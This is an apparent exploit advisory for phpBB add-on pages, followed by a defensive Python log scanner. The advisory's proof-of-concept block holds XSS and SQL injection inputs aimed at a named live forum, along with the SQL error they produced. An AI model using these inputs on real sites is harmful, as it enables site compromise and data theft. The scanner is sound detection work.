phpBB © 2003 - 2008

# Exploit Title: phpBB XSS+SQLi
# Date: 02/05/2023
# Exploit Author: Emiliano Febbi
# Vendor Homepage: ???
# Software Link: Google
# Version: phpBB © 2003 - 2008
# Tested on: Windows 10
# CMS: phpBB
# Dork:/forum/cal.php?cl_d=
# Vulnz: Persistent XSS + SQLi

*PoC*

[code]
http://roxasdarkest.mastertopforum.com/cal.php?cl_d=%25&cl_m=05&cl_y=2023&mode=display <= [*XSS*] #1

...

*Toplist MOD By: WyriHaximus* <= [*Persistent XSS*] #2
/forum/toplist.php?f=toplistnew

name                 info
------------------   -------------------
|                |   |                 |
------------------   -------------------
------------------   -------------------
| bugged         |   | bugged          |   insert: https://www.google.it/'>\>">
------------------   -------------------
URL                  banner

#tested:http://roxasdarkest.mastertopforum.com/toplist.php?f=toplistnew

...

http://roxasdarkest.mastertopforum.com/recent.php?mode=lastXdays&amount_days=4 <= [*SQLi*] #3

#error:
#SQL Error : 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\' ORDER BY t.topic_last_post_id DESC LIMIT 0, 10' at line 8
[/code]

*PoC End*
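
A log check for findings #1 and #3 above, as an added example that is not part of the original advisory: it flags requests to cal.php and recent.php whose date and day-count parameters are not plain integers. The watched parameter list, the 1-4 digit rule and the sample log lines are assumptions constructed for illustration; finding #2 is submitted through a form and does not show up in the query string.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumption: these parameters are plain integers on normal requests, as in the
# advisory's sample URLs (cl_m=05, cl_y=2023, amount_days=4).
NUMERIC_PARAMS = {
    "cal.php": {"cl_d", "cl_m", "cl_y"},
    "recent.php": {"amount_days"},
}
# Pulls the request target out of a combined-log-format line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')


def suspicious_params(request_target):
    """Return (script, param, decoded value) for watched params that are not 1-4 digits."""
    parts = urlsplit(request_target)
    script = parts.path.rsplit("/", 1)[-1]
    watched = NUMERIC_PARAMS.get(script, set())
    # parse_qsl percent-decodes, so cl_d=%25 is checked as the literal "%".
    return [(script, name, value)
            for name, value in parse_qsl(parts.query)
            if name in watched and not re.fullmatch(r"[0-9]{1,4}", value)]


def scan(log_lines):
    """Return (line number, script, param, value) for every flagged request."""
    findings = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            findings += [(number, *hit) for hit in suspicious_params(match.group(1))]
    return findings


# Constructed sample lines (documentation IP range), not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [02/May/2023:10:00:01 +0000] "GET /forum/cal.php?cl_d=12&cl_m=05&cl_y=2023&mode=display HTTP/1.1" 200 5120',
    '192.0.2.44 - - [02/May/2023:10:00:07 +0000] "GET /cal.php?cl_d=%25&cl_m=05&cl_y=2023&mode=display HTTP/1.1" 200 5391',
    '192.0.2.44 - - [02/May/2023:10:00:09 +0000] "GET /recent.php?mode=lastXdays&amount_days=4abc HTTP/1.1" 200 812',
    '192.0.2.10 - - [02/May/2023:10:01:30 +0000] "GET /recent.php?mode=lastXdays&amount_days=4 HTTP/1.1" 200 9044',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print("line %d: %s parameter %s=%r" % finding)
```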